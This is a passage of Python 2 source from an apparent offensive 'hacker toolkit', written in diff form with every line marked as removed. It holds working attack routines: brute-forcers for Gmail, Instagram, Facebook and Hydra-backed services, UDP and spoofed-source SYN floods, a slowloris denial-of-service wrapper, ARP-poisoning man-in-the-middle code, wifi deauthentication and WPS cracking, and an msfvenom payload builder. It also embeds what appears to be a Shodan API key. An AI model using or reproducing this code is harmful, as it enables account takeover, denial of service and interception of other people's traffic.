smtplib.SMTP_SSL('smtp.gmail.com', 465) - server.ehlo() - for password in pass_list: - i = i + 1 - print str(i) + '/' + str(len(pass_list)) - try: - server.login(user_name, password) - system('clear') - main() - print '\n' - print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' - break - except smtplib.SMTPAuthenticationError as e: - error = str(e) - if error[14] == '<': - system('clear') - main() - print '[+] this account has been hacked, password :' + password + ' ^_^' - - break - else: - print '[!] password not found => ' + password - login() -def port(): - n = raw_input("Enter Target: ") - os.system("nmap " + n) -def insta(): - insta = raw_input("USERNAME> ") - jl = raw_input("WORDLIST> ") - k = raw_input("THREADS> ") - ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) - os.system(ma) -def fb(): - facebook = raw_input("[EMAIL/ID->]: ") - word = raw_input("[WORDLIST->]: ") - ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) - os.system(ks) -def ipgrab(): - b = raw_input(Y+'Enter Host:\033[0m ') - ip = socket.gethostbyname(b) - print G+"------------------------\033[0m" - print N+"Host: ", b - print N+"IP: ", ip - print G+"------------------------\033[0m" -def myip(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) -def wifite(): - os.system("wifite") -def mon(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng start " + i) -def netdev(): - os.system("netdiscover") -def scannet(): - os.system("iwconfig") - m = raw_input("Select Interface: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - os.system("airodump-ng -w /root/SCAN " + m) - print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" - if j == "n": - os.system("airodump-ng " + m) -def info(): - params = [] - # Browser - br = mechanize.Browser() - - # Just some colors and shit - white = '\033[1;97m' - green = '\033[1;32m' - red = '\033[1;31m' - yellow = '\033[1;33m' - end = '\033[1;m' - info = '\033[1;33m[!]\033[1;m' - que = '\033[1;34m[?]\033[1;m' - bad = '\033[1;31m[-]\033[1;m' - good = '\033[1;32m[+]\033[1;m' - run = '\033[1;97m[~]\033[1;m' - - # Cookie Jar - cj = cookielib.LWPCookieJar() - br.set_cookiejar(cj) - - # Browser options - br.set_handle_equiv(True) - br.set_handle_redirect(True) - br.set_handle_referer(True) - br.set_handle_robots(False) - - # Follows refresh 0 but not hangs on refresh > 0 - br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) - br.addheaders = [ - ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] - - - print '''\033[1;31m - _________ __ __ __ - / _____// |________|__| | __ ___________ - \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ - / \| | | | \/ | <\ ___/| | \/ - /_______ /|__| |__| |__|__|_ \\\\___ >__| - \/ \/ \/\033[1;m''' - target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') - if 'http' in target: - parsed_uri = urlparse(target) - domain = '{uri.netloc}'.format(uri=parsed_uri) - else: - domain = target - try: - br.open('http://' + target) - target = 'http://' + target - except: - target = 'https://' + target - - def sqli(url): - print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run - br.open('https://suip.biz/?act=sqlmap') - br.select_form(nr=0) - br.form['url'] = url - req = br.submit() - result = req.read() - match = search(r"---(?s).*---", result) - if match: - print '%s One or more parameters are vulnerable to SQL injection' % good - option = raw_input( - '%s Would you like to see the whole report? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - print '\033[1;31m-\033[1;m' * 40 - print match.group().split('---')[1][:-3] - print '\033[1;31m-\033[1;m' * 40 - else: - print '%s None of parameters is vulnerable to SQL injection' % bad - - - def cms(domain): - try: - result = br.open('https://whatcms.org/?s=' + domain).read() - detect = search(r'class="nowrap" title="[^<]*">', result) - WordPress = False - try: - r = br.open(target + '/robots.txt').read() - if "wp-admin" in str(r): - WordPress = True - except: - pass - if detect: - print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) - detect = detect.group().split('">')[1][:-27] - if 'WordPress' in detect: - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - elif WordPress: - print '%s CMS Detected : WordPress' % info - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - else: - print '%s %s doesn\'t seem to use a CMS' % (info, domain) - except: - pass - - def honeypot(ip_addr): - result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} - honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr - try: - phoney = br.open(honey).read() - if float(phoney) >= 0.0 and float(phoney) <= 0.4: - what = good - else: - what = bad - print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) - except KeyError: - print '\033[1;31m[-]\033[1;m Honeypot prediction failed' - - def whoisIt(url): - who = "" - print '{} Trying to gather whois information for {}'.format(run,url) - try: - who = str(whois.whois(url)).decode() - except Exception: - pass - test = who.lower() - if "whoisguard" in test or "protection" in test or "protected" in test: - print '{} Whois Protection Enabled{}'.format(bad, end) - else: - print '{} Whois information found{}'.format(good, end) - try: - data = json.loads(who) - for key in data.keys(): - print "{} :".format(key.replace("_", " ").title()), - if type(data[key]) == list: - print ", ".join(data[key]) - else: - print "{}".format(data[key]) - except ValueError: - print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) - pass - - def nmap(ip_addr): - port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr - result = br.open(port).read() - result = sub(r'Starting[^<]*\)\.', '', result) - result = sub(r'Service[^<]*seconds', '', result) - result = os.linesep.join([s for s in result.splitlines() if s]) - print result - - def bypass(domain): - post = urlencode({'cfS': domain}) - result = br.open( - 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() - - match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) - if match: - bypass.ip_addr = match.group().split(' ')[1][:-1] - print '%s Real IP Address : %s' % (good, bypass.ip_addr) - - def dnsdump(domain): - res = DNSDumpsterAPI(False).search(domain) - print '\n%s DNS Records' % good - for entry in res['dns_records']['dns']: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - for entry in res['dns_records']['mx']: - print '\n%s MX Records' % good - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n\033[1;32m[+]\033[1;m Host Records (A)' - for entry in res['dns_records']['host']: - if entry['reverse_dns']: - print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) - else: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n%s TXT Records' % good - for entry in res['dns_records']['txt']: - print entry - print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) - - - def fingerprint(ip_addr): - try: - result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() - match = search(r'"os_description": "[^<]*"', result) - if match: - print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) - except: - pass - - - ip_addr = socket.gethostbyname(domain) - print '%s IP Address : %s' % (info, ip_addr) - try: - r = requests.get(target) - header = r.headers['Server'] - if 'cloudflare' in header: - print '%s Cloudflare detected' % bad - bypass(domain) - try: - ip_addr = bypass.ip_addr - except: - pass - else: - print '%s Server: %s' % (info, header) - try: - print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) - except: - pass - try: - r.headers['X-Frame-Options'] - except: - print '%s Clickjacking protection is not in place.' % good - except: - pass - fingerprint(ip_addr) - cms(domain) - try: - honeypot(ip_addr) - except: - pass - print "{}----------------------------------------{}".format(red, end) - whoisIt(domain) - try: - r = br.open(target + '/robots.txt').read() - print '\033[1;31m-\033[1;m' * 40 - print '%s Robots.txt retrieved\n' % good, r - except: - pass - print '\033[1;31m-\033[1;m' * 40 - nmap(ip_addr) - print '\033[1;31m-\033[1;m' * 40 - dnsdump(domain) - os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) - try: - br.open(target) - print '%s Crawling the target for fuzzable URLs' % run - for link in br.links(): - if 'http' in link.url or '=' not in link.url: - pass - else: - url = target + '/' + link.url - params.append(url) - if len(params) == 0: - print '%s No fuzzable URLs found' % bad - quit() - print '%s Found %i fuzzable URLs' % (good, len(params)) - for url in params: - print url - sqli(url) - url = url.replace('=', '') - r = br.open(url).read() - if '' in r: - print '%s One or more parameters are vulnerable to XSS' % good - break - print '%s These are the URLs having parameters:' % good - for url in params: - print url - except: - pass -def sysinfo(): - os.system("iwconfig") - k = raw_input("Interface: ") - os.system("clear") - os.system("ifconfig") - os.system("iwconfig") - os.system("neofetch") - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) - show = 'macchanger -s {0}'.format(k) - os.system(show) -def msfex(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show exploits'""") -def udp(): - target = raw_input(N+"Target:\033[91m ") - ip = socket.gethostbyname(target) - port = input(N+"Port:\033[91m ") - os.system("service tor restart") - print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) - os.system("sleep 2s") - sent = 0 - print "KILLING %s CONNECTIONS"%(ip) - while True: - sock.sendto(Gb, (ip,port)) - sock.sendto(bytes, (ip,port)) - sock.sendto(Kb, (ip,port)) - sent = sent + 1 - port = port + 1 - print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) - if port == 65534: - port = 1 -def tcp(): - print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" - print "\n" - tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") - print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" - os.system("sleep 5") - os.system("python /root/hackers-tool-kit/tools/" + tcp) -def syn(): - def randomIP(): - ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) - return ip - - def randInt(): - x = random.randint(1000,9000) - return x - - def SYN_Flood(dstIP,dstPort,counter): - total = 0 - print "Packets are sending ..." - for x in range (0,counter): - s_port = randInt() - s_eq = randInt() - w_indow = randInt() - - IP_Packet = IP () - IP_Packet.src = randomIP() - IP_Packet.dst = dstIP - - TCP_Packet = TCP () - TCP_Packet.sport = s_port - TCP_Packet.dport = dstPort - TCP_Packet.flags = "S" - TCP_Packet.seq = s_eq - TCP_Packet.window = w_indow - - send(IP_Packet/TCP_Packet, verbose=0) - total+=1 - sys.stdout.write("\nTotal packets sent: %i\n" % total) - - - def info(): - - dstIP = raw_input ("\nTarget IP : ") - dstPort = input ("Target Port : ") - - return dstIP,int(dstPort) - - - def main(): - dstIP,dstPort = info() - counter = input ("Packets : ") - SYN_Flood(dstIP,dstPort,int(counter)) - - main() - -def ping(): - p = raw_input("Enter Host: ") - os.system("ping " + p) -def msfpa(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show payloads'""") -def msfau(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show auxiliary'""") -def multih(): - os.system("service postgresql start") - os.system("""msfconsole -x 'use multi/handler'""") -def msfall(): - os.system("service postgresql start") - os.sytem("""msfconsole -x 'show all'""") -def hydra(): - """ - This program is just a small program to shorten brute force sessions on hydra :) - But to be more satisfying results of the brute force. You better interact directly with hydra, - without having to use this black hydra console first: '). - If you find any errors in running our program. Can chat via facebook :). - Hydra is needed for the process of this program :). - """ - import sys, os, time - - # Restart #################### - def restart_program(): - python = sys.executable - os.execl(python, python, * sys.argv) - curdir = os.getcwd() - ############################## - - os.system("clear") - print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" - print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" - print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" - print G+"-----------------------------------------------------" - print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" - print R+" [*] Author: DedSecTL --- [*] Version 1.0" - print N+"c=={:::::::::::::::> Black Hydra Console" - print R+" [*] My FB : https://m.facebook.com/100004136748473" - print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" - print - print " ===|[ Brute Force ]|===" - print - print " [01] Cisco Brute Force " - print " [02] VNC Brute Force " - print " [03] FTP Brute Force " - print " [04] Gmail Brute Force " - print " [05] SSH Brute Force " - print " [06] TeamSpeak Brute Force " - print " [07] Telnet Brute Force " - print " [08] Yahoo Mail Brute Force " - print " [09] Hotmail Brute Force " - print " [10] Router Speedy Brute Force " - print " [11] RDP Brute Force " - print " [12] MySQL Brute Force " - print - print " [00] Exit" - print - bhydra = raw_input("[*] B-Hydra > ") - - if bhydra == '01' or bhydra == '1': - print - print " +---------------------------+" - print " | Cisco Brute Force |" - print " +---------------------------+" - print - print - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -P %s %s cisco" % (word, iphost)) - sys.exit() - - elif bhydra == '02' or bhydra == '2': - print - print " +---------------------------+" - print " | VNC Brute Force |" - print " +---------------------------+" - print - print - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) - iphost = raw_input("[*] IP/Hostname : ") - - elif bhydra == '03' or bhydra == '3': - print - print " +------------------------------+" - print " | FTP Brute Force |" - print " +------------------------------+" - print - print - user = raw_input("[*] User : ") - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '04' or bhydra == '4': - print - print " +------------------------------+" - print " | Gmail Brute Force |" - print " +------------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '05' or bhydra == '5': - print - print " +--------------------------------+" - print " | SSH Brute Force |" - print " +--------------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) - sys.exit() - - elif bhydra == '06' or bhydra == '6': - print - print " +-------------------------+" - print " | TeamSpeak Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) - sys.exit() - - elif bhydra == '07' or bhydra == '7': - print - print " +-------------------------+" - print " | Telnet Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) - sys.exit() - - elif bhydra == '08' or bhydra == '8': - print - print " +---------------------------+" - print " | Yahoo Brute Force |" - print " +---------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '09' or bhydra == '9': - print - print " +----------------------------+" - print " | Hotmail Brute Force |" - print " +----------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '10': - print - print " +-----------------------------+" - print " | Router Speedy Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) - sys.exit() - - elif bhydra == '11': - print - print " +----------------------------+" - print " | RDP Brute Force |" - print " +----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '12': - print - print " +-----------------------------+" - print " | MySQL Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) - - elif bhydra == '00' or bhydra == '0': - print "\n[!] Exit the Program..." - sys.exit() - - else: - print "\n[!] ERROR : Wrong Input" - time.sleep(1) - restart_program() -def cupp(): - os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") - print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" -def vdir(): - print "\n" - os.system("ls") - print Y+"! doesnt have to be these can be any directory !\033[0m" - print "\n" - h = raw_input("Directory Path: ") - print "\n" - print "--------------------------------------------------------------------------------------------------------------------------------------------" - os.system("ls " + h) - print "--------------------------------------------------------------------------------------------------------------------------------------------" - -def monoff(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng stop " + i) -def vpn(): - os.system("anonsurf start") - os.system("anonsurf myip") -def vpnoff(): - os.system("anonsurf stop") - os.system("anonsurf myip") -def slowl(): - de = raw_input("Delay: ") - tar = raw_input("RHOST: ") - port = raw_input("RPORT: ") - soc = raw_input("Sockets: ") - os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') - os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) - os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) - os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) - os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) - os.system('echo "run\n" >> slowl.rc') - os.system('msfconsole -r slowl.rc') - os.system('rm -rf slowl.rc') - -def pidox(): - print Y+"! USING FIREFOX !\033[0m" - os.system("sleep 2") - os.system("firefox https://pipl.com/") -def specnet(): - jk = raw_input("BSSID: ") - kj = raw_input("ESSID: ") - os.system("iwconfig") - k = raw_input("INTERFACE: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) - if j == "n": - a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) -def pingen(): - j = raw_input("Enter BSSID: ") - a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) - os.system(a) -def reaver(): - os.system("iwconfig") - j = raw_input("Select Interface: ") - k = raw_input("Enter BSSID: ") - a = 'reaver -i {0} -b {1} -vv'.format(j,k) - os.system(a) -def deauth(): - print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" - j = raw_input("Enter BSSID> ") - os.system("iwconfig") - k = raw_input("Enter Interface> ") - a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) - os.system(a) -def macc(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -r " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -def macoff(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -p " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -def arppois(): - - try: - os.system("iwconfig") - interface = raw_input("[*] Enter Interface: ") - victimIP = raw_input("[*] Enter Victim IP: ") - gateIP = raw_input("[*] Enter Router IP: ") - except KeyboardInterrupt: - print "\n[*] User Requested Shutdown" - print "[*] Exiting..." - os.system("clear") - mainbanner() - - print "\n[*] Enabling IP Forwarding...\n" - os.system("echo 1 > /proc/sys/net/ipv4/ip_forward") - - def get_mac(IP): - conf.verb = 0 - ans, unans = srp(Ether(dst = "ff:ff:ff:ff:ff:ff")/ARP(pdst = IP), timeout = 2, iface = interface, inter = 0.1) - for snd,rcv in ans: - return rcv.sprintf(r"%Ether.src%") - - def reARP(): - - print "\n[*] Restoring Targets..." - victimMAC = get_mac(victimIP) - gateMAC = get_mac(gateIP) - send(ARP(op = 2, pdst = gateIP, psrc = victimIP, hwdst = "ff:ff:ff:ff:ff:ff", hwsrc = victimMAC), count = 7) - send(ARP(op = 2, pdst = victimIP, psrc = gateIP, hwdst = "ff:ff:ff:ff:ff:ff", hwsrc = gateMAC), count = 7) - print "[*] Disabling IP Forwarding..." - os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") - print "[*] Shutting Down..." - os.system("clear") - mainbanner() - - def trick(gm, vm): - send(ARP(op = 2, pdst = victimIP, psrc = gateIP, hwdst= vm)) - send(ARP(op = 2, pdst = gateIP, psrc = victimIP, hwdst= gm)) - - def mitm(): - try: - victimMAC = get_mac(victimIP) - except Exception: - os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") - print "[!] Couldn't Find Victim MAC Address" - print "[!] Exiting..." - os.system("clear") - mainbanner() - try: - gateMAC = get_mac(gateIP) - except Exception: - os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") - print "[!] Couldn't Find Gateway MAC Address" - print "[!] Exiting..." - os.system("clear") - mainbanner() - print "[*] Poisoning Targets..." - while 1: - try: - trick(gateMAC, victimMAC) - time.sleep(1.5) - except KeyboardInterrupt: - reARP() - break - mitm() -def sslscan(): - j = raw_input('Enter Target: ') - a = 'sslscan {0}'.format(j) - os.system(a) -def payload(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - print "\n" - f = raw_input("Select Payload: ") - l = raw_input("LHOST: ") - c = raw_input("LPORT: ") - os.system("cat /root/hackers-tool-kit/tools/formats.txt") - s = raw_input("Format: ") - h = raw_input("File Name: ") - a = 'msfvenom -p {0} LHOST={1} LPORT={2} -f {3} -o /root/{4}.{5}'.format(f,l,c,s,h,s) - os.system(a) -def crunch(): - print "minimal number of characters" - j = raw_input("[CRUNCH]: ") - print "maximum number of characters" - k = raw_input("[CRUNCH]: ") - print "what characters should be in it" - b = raw_input("[CRUNCH]: ") - print "name of file" - s = raw_input("[CRUNCH]: ") - a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) - os.system(a) - print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s -def traff(): - os.system("iwconfig") - s = raw_input("Select Interface: ") - os.system("tcpdump -i " + s) -def resa(): - j = raw_input("USERNAME: ") - k = raw_input("NEW PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'echo "{0}:{1}" | chpasswd'.format(j,k) - print "password for {0} has been reset".format(j) -def resu(): - j = raw_input("PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'passwd {0}'.format(j) - print "unix password has been reset".format(j) -def hashid(): - #!/usr/bin/python - # encoding: utf-8 - # Hash Identifier v1.1 - # By Zion3R - # www.Blackploit.com - # Root@Blackploit.com - - logo=''' ######################################################################### - # __ __ __ ______ _____ # - # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # - # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # - # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # - # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # - # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # - # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # - # By Zion3R # - # www.Blackploit.com # - # Root@Blackploit.com # - #########################################################################''' - - algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} - - # hash.islower() minusculas - # hash.isdigit() numerico - # hash.isalpha() letras - # hash.isalnum() alfanumerico - - def CRC16(): - hs='4607' - if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101020") - def CRC16CCITT(): - hs='3d08' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101040") - def FCS16(): - hs='0e5b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101060") - - def CRC32(): - hs='b33fd057' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102040") - def ADLER32(): - hs='0607cb42' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102020") - def CRC32B(): - hs='b764a0d9' - if len(hash)==len(hs) and 